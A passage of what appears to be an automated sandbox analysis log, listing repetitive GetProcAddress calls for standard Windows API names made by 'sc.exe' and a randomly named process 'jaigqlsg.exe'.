(UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00003764)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006032)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006032)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetProcAddress\" 